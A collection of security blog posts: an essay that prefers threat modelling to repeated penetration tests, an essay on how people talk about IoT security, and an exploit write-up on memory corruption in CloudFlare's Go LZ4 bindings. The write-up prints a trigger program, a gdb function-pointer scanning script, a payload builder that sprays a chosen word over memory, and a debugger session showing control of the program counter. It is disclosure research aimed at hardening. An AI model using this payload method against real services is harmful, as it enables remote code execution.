And what's this about some bizarre new RSA 1024bit key hack thingie?!? Is that even real!? How do we test for that?! 

Ah, yes. Now those penetration testers have to come back. If it's once per quarter, now we're talking about 48,000 USD per year. If it's once a month, which is a more realistic cadence for a somewhat reasonable analysis, now we're talking about 144,000 USD per year. Unsustainable. 

At this point executives are rightfully pissed, and probably feel pretty shitty about where their money is going. The security process seems unmanageable, and the money feels burned. 

Stop Killing Money

There is an easy way to stop this ridiculous cycle. It starts with a simple threat model, and ends with processes and controls that integrate security into not only the daily engineering process, but the work place. Every technology can be hacked. My work is proof of that. I have exceptional colleagues that are proof of that even more than I am: Charlie Miller and Chris Valasek, Zach Lanier and Mark Stanislav, Stephen Ridley, Thaddeus Grugq, Ben Nagy, and countless others. 

Yes, everything can be hacked. But, there is a method for reducing the potential for risk and managing it in a cost-effective manner:
  • Identify key assets that affect the business, its partners, and its customers
  • Prioritize assets by potential effect 
  • Build security goals around these prioritized assets
  • Define policies and procedures that support security goals
  • Ensure infrastructure supports security goals
  • Monitor infrastructure constantly, assign responsibilities
  • Integrate security engineering into the product and/or service life cycle
This simple seven-step process will take a company from zero to hero far faster than penetration testing engagements or managed security services ever could. Let's look at a simple engagement in which a consultant walks ASU through this process.

Asset review/Priority meeting/Initial threat model = 5-10 days
Defining policy and procedure/Enhancing infrastructure/Building baseline = 5-10 days
Define monitoring system/Assign responsibility/Add OSS controls = 5-10 days
Integrate security into SDLC (only if org has engineering dept) = 10 days
Average consulting rate = 250 USD per hour
Total high watermark (40 days) = 80,000 USD
Total low watermark (25 days) = 50,000 USD

A single threat modeling and architecture enhancement engagement will cost between 50,000 USD and 80,000 USD. It typically only needs to be performed once. A solid architecture not only enables the organization to diminish its risk, but it helps the organization understand how to manage its security in a way that provides longevity. When a threat arises, the organization will be better equipped to respond effectively, rather than relying on an external organization to swoop in and solve the problem for a six figure price. 

In addition, internal penetration testing capability and vulnerability assessment automation can be integrated into the process defined by this engagement, allowing the organization to not only audit themselves but to interpret the results of the audit effectively. 

For an organization the size of our example, ASU, the project would come in at the low end of the price spectrum. Even at the high per-hour rate of 250 USD, it would come out only 2,000 USD above the annual cost of quarterly penetration testing, but with a far greater return on investment! If ASU negotiated the price down to the same rate as the penetration testing team, 150 USD per hour, the cost would end up at 30,000 USD. This is only two and a half times the price of a single average penetration testing engagement. 

Failure Shouldn't Be Feared

Will organizations get hacked? Of course. Will an organization with a well defined security practice still get hacked? Unfortunately, it is likely. But, will an organization with a well defined security practice identify, isolate, and expunge the threat quickly and effectively with far less risk to the business and its clients? Yes! 

The security process is not perfect. But, that is no reason to allocate resources to the wrong activities, then argue that "we did the same things everyone else did" when a risk is exploited. Instead of learning to do the wrong things, we must be brave enough to do the harder things, sooner. 

If we learn these lessons, we'll be able to decrease risk not only in our working environments, but within our products and services. Failure isn't something to be terrified of. We must integrate the lessons learned into our processes to ensure that we are less likely to fail, instead of shaking our heads and presuming "that isn't going to be me."

More importantly, when companies get ready to IPO or be acquired, lawyers tell us that it is becoming increasingly common for security audits to be a forced part of the process. There have been more than a few cases in the past several years where companies being evaluated for acquisition failed because their security architecture was so unmanageable it would have required a complete overhaul. This is not how you get a shiny new red 1993 Porsche 911. 

Success is a mobile phone. 

Everyone fails sooner or later, especially in information security. Pretending the underlying problem doesn't exist is the same as putting black bands on a Poison album cover and saying you've saved the innocence of American teenagers. The real sign of success in an information security program is how quickly you recover, how effectively you can isolate risk to your business and your clients, and how much your customers trust your transparency. 

As it happens, Lab Mouse is running a special discount on threat modeling and architecture security engagements for start-ups and small businesses! If you're in need of security services, please reach out! I will be happy to provide you with a valuable engagement that scales according to your budget. 

Best wishes,
Lab Mouse Security

Tuesday, September 23, 2014

No Thing Left Behind

You're Damn Right

Adorable Crochet Puppy Mauls Researcher

Most of what we've heard about the Internet of Things (IoT) has been pushing fear, uncertainty, and doubt with regard to security. But, the effect has not been an improvement in security! Rather, the result has been fear that information security researchers aren't taking the time to look at the actual threat surface affected by the device(s) they analyze. Uncertainty regarding what direction engineers should take in order to solve realistic IoT security concerns. And doubt as to whether the talking heads driving the industry conversation are basing their perspectives on any semblance of reality whatsoever. In effect, the Internet of Things landscape looks much like a foggy moor with Dracula hovering menacingly over a bubbling bog. The reality, however, is quite the contrary. Internet of Things security is about as terrifying as Grayson the Vampire Puppy, whose cute and cuddly fangs will snuggle their way into your palpitating heart. 
Grayson Will Stare Deep into Your Void, Researcher Soul

Lead Your Flock

My biggest concern with the current conversation about IoT has nothing to do with Dave's concerns. While his concerns are valid, I don't have to sit around reading CFP submissions for Infiltrate and SyScan. Though hacking some random device has value, it has less value than it did four years ago. This is not to invalidate the work people are putting in to get up to speed. This is a comment on the structure of our industry. If we look at the industry from a scientific perspective, we need only take enough samples to identify patterns of behavior. In IoT, we have established not only patterns of behavior, but substantial models in which the Things exist. So, at some point, we should move on from hacking things to solving models. Instead of breaking down hardware just to score a point on the information security conference scene, we should be holding the hands of these devices as they prepare to enter the brave new world they're designing for us. 

Off to School, Little Guy
This year at Black Hat, Zach Lanier and I (Don A. Bailey) started this very conversation by getting people to talk more about the models than the devices.  This was reinforcement of the ideas I set forth at the CyberHive Securing the Internet of Things: Masters dinner, where I presented on this very concept just prior to Black Hat. The only way we can move forward as an industry is if we start talking about the correct models in IoT, the realistic risks associated with the models, and practical ways to mitigate these risks. 

The Butt Dance 

Another major concern is the platform upon which people speak. I am of the belief that everyone, and I do mean everyone, has value to bring to a community. Agreeing or disagreeing with a person or a perspective is often moot. What is important is whether people's opinions are heard, and whether a consensus is achieved as to whether the opinion has merit. For this to work, opinions must be presented with facts or some semblance of research to support the opinion as more than subjective rantings. That said, we also live in a highly competitive world, and an even more competitive industry. I get it. We all want to be the best at all the Things. That's fine. 

But, when one or a few of us decide to be the mouthpiece for the industry, they had better have their shit together. There are a few things wrong with being a talking head without a body. Without an appropriate and well-researched technological platform on which to stand, a mouthpiece is spouting nothing anyone wants to hear. This is because the intentions come from a heartwarming, fuzzy, Care Bear Stare place of good will, but the words are jumbled and juxtaposed webs of bullshit that look like something a spider might spin on copious amounts of drugs. 

Charlie Can Serve It Up
People aren't stupid. Engineers aren't stupid. Project managers and product drivers are not stupid. They might not be as technically capable as a security researcher, but they understand the technology and business risks. What they often lack is the ability to prioritize threats according to probability of abuse, and to couple those prioritized concerns with tangible, practical, and cost-effective solutions. That's our job: to bridge that gap. If we waste their time with hyperbole, they will realize that we're full of shit and look for solutions elsewhere. This helps no one and distills a significant and imperative message of security down to what is essentially a Butt Dance: people think you're either insulting them, or yourself, but they can't tell which. That's a problem. 

IoT: The Next Generation

Take a break. Let's stop acting for a moment and take a break. Put down the Saleae Logic analyzer. Put down the oscilloscope. Put down the multimeter. Let's circle back as an industry and get our message right. There's a whole world out there of product owners, engineers, lawyers, and politicians who are willing to help build and enforce security. But, in order to make it happen, we need a cohesive message. 

Delicious Breaks...
As a result, there are a few rules that need to be adhered to. These aren't my rules. They're really just common sense points that should be emphasized. 

For Speakers

  • Debugging is not a hack
  • Sunlight shining down on garbage don't make garbage smell sweeter
  • Trust is built by new research, not describing the wheel
Telling hardware, firmware, or software engineers that using interfaces specifically designed to analyze or alter code is a hack is really a poor attempt at hacking humans. You're trying to convince someone that you performed a significant attack by doing something that the device or interface was designed to do. This is universally ridiculous, and is essentially insulting to your potential customer. Sure, they might want to disable debugging capability in production-level devices, but do they need to? What's the true risk to the business or to the end-user if debugging capability is left enabled? Every device has a different threat surface. Identify whether this even falls into the category of reasonable risk. 
Ricky Understands Metaphors

There's a famous saying in the south about sunlight never sweetening garbage. It essentially means that no matter what light you shine on a certain topic, you'll never frame that topic in a way that makes it seem desirable. This is the case with presenting an attack from the perspective of the wrong threat model. For example, I recently had a discussion with an individual who couldn't get beyond the use of Zigbee in a home product. They were absolutely infuriated that this product used Zigbee because of "all the security risks" with the Zigbee protocol. Sure, Zigbee has issues, but are those issues in scope? Their perspective was that Zigbee was a serious problem because it "makes everything critically vulnerable". But, they completely hand-waved over the fact that the risk can't be abused remotely. So, sure, you might be able to break the crypto key in a reasonable amount of time for every single instance of this particular device. But, you'd have to figure out how to do it at each instance's location. This means you'd need a secondary (or more) set of attacks to even get to the Zigbee layer, or be on site at every attack location. This is not a realistic attack! Sure, you'll get some laughs at a conference about how Zigbee can be broken if the crypto is weak, but you're not really breaking the IoT device at that point. You're just breaking Zigbee. So, talk about Zigbee and be done with it. Oh, Zigbee talks have already been done? Whoops. 

And since you're not in the business of reinventing the wheel, why do something someone else has already done? Break new ground! That's why we're here, right? Scanning the Internet for VNC ports may not be a valuable use of your time when instead you could have said "hey, let's try and push for standards and legislation requiring ISPs to restrict access to critical ports unless subscribers explicitly ask" or some such variation. More importantly, what if the real research focused on how embedded photovoltaic systems are being designed with VNC enabled by default in some models? Wouldn't it be more useful to talk about the specific issues, and assist those companies with engineering to help diminish the problem at the source, rather than shaking a finger at the aftermath while using the same finger to point every would-be attacker in the direction of all the vulnerable things? Yeah. 

Not one bit.

For Talking-Heads

  • Your job is to get us through the golden gates
  • Never build a house on sand
  • Kiwis can't fly, and they don't tell people they can
The number one job of a talking head is to open doors and burst through gates. Oftentimes technical researchers don't have the time or negotiating skills to get into the right places to effect change at high levels. The talking head is designed, through evolution, for this specific goal. But, if the talking head presumes he or she can fulfill the role of a technical researcher once through those gates, they risk losing the ear of the audience in the secret rooms and clubhouses of the elite. You cannot afford to lose the contacts you've just made by augmenting your verbiage with less-than-honest technical details. Someone will notice, and you'll be excommunicated from those golden halls. Accept your position as, essentially, a politician. A politician's job is to speak the word of their constituents. In this case, it's the voice of the technical community. Be the channel through which the technical community speaks to the executive decision makers of the world. Only together can you facilitate action. Separately, the story becomes imbalanced and full of holes that even non-technical people can identify quickly. 

Building a house on sand is the same as making technical presumptions without the technical or engineering experience to know they are true. A great example of this is Karsten Nohl's brilliant work on USB hacking. The attack works because removable devices have no trust mechanism, regardless of what type of device they are. Seeing a USB mouse is believing the device is a USB mouse. But, anyone that has ever written firmware (especially for a USB module) knows that the firmware can be written on a generic module, and the firmware can present any type of USB device it wants to be. Without the technical details, the attack surface will look like "what if someone uses this mouse while you're gone to click on an administrative interface" when the real attack surface may be "this mouse can detect when it has been idle for over 5 minutes, and will then switch to a USB network dongle and hijack your DNS". Without accurate technical details you can't facilitate proper mitigation, which will cause high-level decision makers to kick off initiatives with poorly designed scope. High-level initiatives may take years to adjust if they aren't formulated accurately. Think about how long it took to integrate proper security engineering into Microsoft's SDLC. This was a result of a model that incorrectly dealt with security gaps and needed to be adjusted over time to accommodate existing infrastructure and personnel. 

Finally, and this is just reiterating the points made above, never tell someone you know something you don't. Jack Welch of GE fame was a brilliant business leader because he knew the value of the gaps in his knowledge. Jack openly admits that his sole job was to hire people who were smarter than him to fill those gaps. This allowed him to run GE with not only an iron fist, but an iron mind. He had the support of his employees, because they knew he put his trust in them to advise him. Use the technical research community in the same way. While none of us will want to be seen as your employee (unless we technically are), if you present a message as a community initiative - not your own - the community will participate. 


We've got a long way to go with IoT. The technology is moving fast, but it's not a terror or a loss. In fact, it's getting better every day. Today, we have access to organizations like Bugcrowd and HackerOne to facilitate crowd-scale security testing. We've got more researchers and white papers on security process than we can shake a stick at. We've got increasingly well engineered technology for deploying trusted hardware. Sure, it's not perfect, but we're light years beyond where we thought we'd be five years ago. 

So let's stop talking about how the world is burning, and start working together to put out the real fires. In other words, PoC||GTFO. 

Only You Can Save the World

Friday, July 11, 2014

Bla Bla LZ4, Bla Bla GoLang Or Whatever

I Was Coerced 

A lot of people don't know this, but I've known Jaime Cochran for almost fifteen years. We've been friends as long as I've been on the Internet. So, when she jabbed me earlier tonight saying "Hey, why the hell haven't you looked at GoLang yet?", my first reaction was obviously "Kiss off". My second reaction was "fine, I guess I should at least search around". 

As it turns out, CloudFlare (who I actually like quite a bit) has a vulnerable GoLang package on GitHub that has been fairly popular. Last night I poked around a bit and got silly with the Go Stuffs. The result was the following source file:

package main

import (
        "fmt"
        "io/ioutil"

        // Import path assumed; I built against a local checkout of
        // CloudFlare's golz4 bindings.
        lz4 "github.com/cloudflare/golz4"
)

func main() {
        input, err := ioutil.ReadFile("/home/x/lz4/go.lz4")
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
                return
        }

        // 17MB output buffer for the malicious stream to scribble past.
        output := make([]byte, (17 * 1024 * 1024))
        err = lz4.Uncompress(input, output)
        if err != nil {
                fmt.Printf("failed: %#v\n", err)
        }
}
Using this little beauty with CloudFlare's package resulted in the following Fun Times (TM). Note that I'm not even changing the contents of the payload, I'm only adjusting the offset a bit. More details on this later. 

donb@debian:~$ ./donblz4
fatal error: unexpected signal during runtime execution
[signal 0xb code=0x2 addr=0x2 pc=0x804bf11]

runtime stack:
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
        /home/x/lib/src/go/go/src/pkg/runtime/panic.c:520 +0x71
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
        /home/x/lib/src/go/go/src/pkg/runtime/os_linux.c:222 +0x46
... and so on ...

Well, because I have had just about enough of this LZ4 hacking crap, I was ready to call it a night. But, Ben Nagy (who I once got drunk with in Singapore, surprise, surprise) asked me to investigate a bit further. Why? He's interested in using this as an example to push for GoLang run-time hardening. I'm Pro-Ben (I honestly haven't given much thought to run-time hardening in Go ;-)) so I figured I'd help out. 

I really have no idea whether people will care or listen to these details, or whether they'll even help with run-time hardening. But, what the heck, right? Let's try and Do Some Good, anyway. 

Quick and Dirty

So, the point of this is not necessarily to gain RCE, but to prove that RCE is possible. This is because libraries like CloudFlare's LZ4 package, like the other LZ4 targets I've been testing, are attacked out of application context. Because of GoLang's memory layout, I cannot (in this short amount of time) develop a guaranteed one-shot RCE like I can for Erlang and Python. 

But, attacking GoLang is much more profitable than Ruby. With Ruby, you never know where your memory chunk will end up in RAM and you never know whether there is a valid page prior to that chunk. In GoLang, things are much, much simpler. 

(gdb) where
#0  LZ4_decompress_fast (source=0x18336000 "\017", dest=0x19348000 "", outputSize=17825792)
    at /home/donb/go/src/golz4/src/lz4.c:823
#1  0x0804c212 in LZ4_uncompress (outputSize=<optimized out>, dest=<optimized out>,
    source=<optimized out>) at /home/donb/go/src/golz4/src/lz4.h:193
#2  _cgo_e56f7980f8b8_Cfunc_LZ4_uncompress (v=0xb7d3eea4) at /home/donb/go/src/golz4/lz4.go:50
#3  0x08072125 in runtime.asmcgocall () at /home/donb/lib/src/go/go/src/pkg/runtime/asm_386.s:624
#4  0xb7d3eea4 in ?? ()

After loading up 'donblz4' and breaking at LZ4_decompress_fast, the function called by the GoLang bindings, we see the above call trace. All we really need to look at is the variable dest, which identifies the address at which the decompression payload will be stored. This is the address from which memory corruption will occur. So, the most likely memory segment to corrupt will be the one this address resides in. 

Unlike Ruby, which uses Linux's standard glibc heap for new memory buffers/Objects, GoLang uses a completely separate memory segment. It creates a memory map that is Read and Write only. We can easily spot this by checking the process's memory mapping. 

(gdb) info inferiors
  Num  Description       Executable
* 1    process 8291      /home/donb/donblz4
(gdb) ^Z
[2]+  Stopped                 gdb -q donblz4
donb@debian:~$ cat /proc/8291/maps
08048000-0815f000 r-xp 00000000 fd:00 122015     /home/donb/donblz4
0815f000-0816f000 rw-p 00116000 fd:00 122015     /home/donb/donblz4
0816f000-081a4000 rw-p 00000000 00:00 0          [heap]
08200000-08205000 rw-p 00000000 00:00 0
08205000-17ec0000 ---p 00000000 00:00 0
17ec0000-1a500000 rw-p 00000000 00:00 0
1a500000-38302000 ---p 00000000 00:00 0

Obviously, the address at which dest points does not fall within the standard heap. As suggested above, there is an entirely separate memory chunk. What's great about this chunk is it isn't just allocated for our large LZ4 decompression payload. And, even if it were, it isn't the only type of data that lives there. 

Scanning around that chunk of memory we can easily determine whether function addresses reside here, and whether they will sit at predictable offsets in RAM. 

I generated a simple gdb script to identify values in memory that fall within the 'donblz4' executable's regions:

define scanlz4

        set $x = ($arg0)
        set $y = ($arg1)
        set $x_start = ($arg2)
        set $x_end = ($arg3)

        while $x < $y
                if *(unsigned int *)$x >= $x_start && *(unsigned int *)$x < $x_end
                        printf "%.08x: found value %.08x \n", $x, *(unsigned int *)$x
                end
                set $x += 4
        end
end


Running the above script, even against our tiny do-nothing test executable, revealed over 50 results within the same chunk of memory as our dest buffer. 

(gdb) scanlz4 0x183000e0 0x1a500000 0x08048000 0x0815f000
183000ec: found value 0807353a 
18300124: found value 080fa3b8 
18300144: found value 080fa3d8 
18300164: found value 080fa398 
18300184: found value 080fe278 
183020b8: found value 08072109 
183020d4: found value 08050a7a 
18302130: found value 08070be2 
18302298: found value 08051474 
183022b4: found value 08051474 
18302310: found value 0805cc20 
18302338: found value 0805f204 
183023b0: found value 08055ee0 
183023d8: found value 0805f204 
18302450: found value 08055ee0 
183026f8: found value 0805f4b0 
18302714: found value 0805f4b0 
18304004: found value 080f2880 
18304064: found value 080ecc81 

We can easily confirm that these values are actual function addresses by inspecting the instructions at each offset. 

(gdb) x/8i 0x0807353a
   0x807353a :   pop    %ecx
   0x807353b :   pop    %ecx
   0x807353c :   test   %eax,%eax
   0x807353e :   jne    0x80735de
   0x8073544 :   mov    0x2c(%esp),%ebx
   0x8073548 :   mov    %ebx,(%esp)
   0x807354b :   mov    0x6c(%esp),%ebx
   0x807354f :   mov    %ebx,0x4(%esp)

So now that we know where a bunch of function addresses are, we can really just adjust the LZ4 payload I've been using in all of my blog posts to spam 0x11223344 at a chunk of memory that has a high concentration of known function pointers. 
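The shape of that spray payload is worth sketching. What follows is my reconstruction, not the actual payload from the earlier posts: a single 4-byte literal followed by an overlapping match with offset 4, so the decompressor keeps copying the word over itself. The minimal decoder mirrors the copy loop in LZ4_decompress_generic, including the overlapping match copy and, crucially, no bounds checking on dest.

```go
package main

import (
	"bytes"
	"fmt"
)

// sprayPayload builds a raw LZ4 sequence that decompresses into `count`
// copies of a 4-byte word. Function names here are my sketch, not the
// actual payload generator.
func sprayPayload(word [4]byte, count int) []byte {
	var b bytes.Buffer
	b.WriteByte((4 << 4) | 0x0F) // token: 4 literal bytes, extended match length
	b.Write(word[:])             // the word to spray
	b.WriteByte(0x04)            // match offset = 4, little endian
	b.WriteByte(0x00)
	// The match produces count*4-4 bytes; subtract minmatch (4) and the
	// token nibble (15) to get the extension byte total.
	rem := count*4 - 4 - 4 - 15
	for rem >= 255 {
		b.WriteByte(0xFF)
		rem -= 255
	}
	b.WriteByte(byte(rem))
	return b.Bytes()
}

// decode is a minimal LZ4 block decoder, just enough to show how the
// payload above expands.
func decode(src, dst []byte) int {
	si, di := 0, 0
	for si < len(src) {
		tok := src[si]
		si++
		llen := int(tok >> 4) // literal run length
		if llen == 15 {
			for src[si] == 255 {
				llen += 255
				si++
			}
			llen += int(src[si])
			si++
		}
		copy(dst[di:], src[si:si+llen])
		di += llen
		si += llen
		if si >= len(src) {
			break // blocks may end on a literal run
		}
		off := int(src[si]) | int(src[si+1])<<8 // match offset
		si += 2
		mlen := int(tok & 0x0F)
		if mlen == 15 {
			for src[si] == 255 {
				mlen += 255
				si++
			}
			mlen += int(src[si])
			si++
		}
		mlen += 4 // minimum match length
		for ; mlen > 0; mlen-- {
			dst[di] = dst[di-off] // overlapping copy repeats the word
			di++
		}
	}
	return di
}

func main() {
	p := sprayPayload([4]byte{0x44, 0x33, 0x22, 0x11}, 64)
	dst := make([]byte, 64*4)
	fmt.Printf("%d-byte payload expanded to %d bytes\n", len(p), decode(p, dst))
	// prints: 8-byte payload expanded to 256 bytes
}
```

An 8-byte input filling 256 bytes of output illustrates why a small compressed payload can blanket a large region of function pointers.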

Doing so demonstrates that these function pointers can be corrupted in a reliable fashion. What I end up controlling, however, are threads other than the one LZ4 is executing within. In fact, the entire LZ4 payload hasn't even finished writing by the time the memory corruption triggers a SIGSEGV in another thread. 

(gdb) c

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb743bb70 (LWP 8295)]
0x11223344 in ?? ()
(gdb) info threads
  Id   Target Id         Frame
  4    Thread 0xb6c3ab70 (LWP 8296) "donblz4" 0x0804c00d in LZ4_decompress_generic (targetOutputSize=0,
    partialDecoding=0, prefix64k=1, endOnInput=0, outputSize=17825792, inputSize=0, dest=0x19348000 "",
    source=0x18336000 "\017") at /home/donb/go/src/golz4/src/lz4.c:759
* 3    Thread 0xb743bb70 (LWP 8295) "donblz4" 0x11223344 in ?? ()
  2    Thread 0xb7d3cb70 (LWP 8294) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
  1    Thread 0xb7e4d6d0 (LWP 8291) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21

So, there we have it. Because the dest buffer resides in the same memory chunk as function pointers, and there are no guard pages to hinder memory corruption, I have the ability to overwrite objects in memory that affect other threads. 

All in all, this is pretty Good Times. I'm glad Jaime and Ben pushed me to bother with this because otherwise I would have just closed out with Erlang. Three remote RCE capable languages with LZ4 is pretty sick, though, and was deserving of my time. 


So now we know that RCE can be achieved in GoLang. However, there are caveats:
  • Unlike Erlang and Python, memory layout isn't guaranteed
  • The entire "compressed" LZ4 payload may precede anything important (must jump over it)
  • This means that (for now) there is no universal one-shot exploit for GoLang via LZ4
  • A Function-Spray doesn't necessarily cause a SIGSEGV before the pointer is executed
  • This is sufficient evidence for improvement (hardening) of the GoLang runtime
  • CloudFlare, please update your LZ4 repo
Don A. Bailey
Founder / CEO
Lab Mouse Security